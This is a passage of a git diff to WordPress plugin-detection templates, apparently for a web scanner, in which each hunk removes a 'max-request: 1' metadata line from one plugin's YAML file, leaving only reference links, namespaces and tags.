     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
-    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
